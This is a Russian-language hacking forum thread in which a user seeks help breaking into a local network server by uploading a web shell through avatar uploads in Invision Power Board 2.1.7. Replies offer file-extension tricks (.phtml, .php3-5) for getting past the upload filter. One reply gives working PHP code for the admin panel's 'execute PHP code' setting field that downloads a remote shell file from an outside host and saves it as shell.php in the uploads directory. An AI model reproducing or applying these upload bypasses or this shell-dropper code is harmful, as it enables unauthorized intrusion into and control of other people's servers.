|
Проблема с заливкой шелла в Invision Power Board v2.1.7
доброго времяни суток...
подскажите куда ломиться, только именно подсказать интересней самому врубиться ) итак у меня задачка сломать сервак локальной сети... пробывал ломиться через форум Invision Power Board v2.1.7 заливка шелла через аватары и фоты обламилась... единственное, что мне показалось неадекватным, это реакция сервака на имя файла... если я пытаюсь залить так script.php.jpg - он переименовывает весь фаил так av-(uid).txt script.PHP.jpg - просто не пускает, также как и просто некорректный джипег... лажа какая-то... :confused: подскажите может не в той стороне копаю ??? |
попробуй не .php а .phtml или .php3,4,5
|
некатит (( всёравно переименовывает в тхт
|
да кстати меня интересует вопрос... можно-ли запустить скрипт с удалённого сервера через аватару... если какчать через какоёнить сервак то пхтмл и пхп не переименовываються... хотя и скрипт не скачиваеться а пишеться как ссылка
|
php исполняеться на самом сервере!
Толку не будет никакого. |
блин будем пробывать ломиться через самопальные скрипты... будем надеяться на ошибки кодера...
|
если есть доступ в админку то попробуй через настройки.там когда создаёшь новую то есть поле "выполнить php код до сохранения настройки"
туда вписывай $linky="http://site.com/shell.txt"; $saved="/home/empire/public_html/uploads/shell.php"; (путь посмотри в настройках) $from=fopen("$linky","r"); $to=fopen("$saved","w"); while(!feof($from)){ $string=fgets($from,4096); fputs($to,$string); } fclose($to); fclose($from); |
Ты не зальёшь картинку шелл =(
|
в 2.3.6 php переименовывает в txt а phtml оставляет как есть, но показывает как txt =(
|
http://forum.antichat.ru/thread76949.html
|
| Время: 19:26 |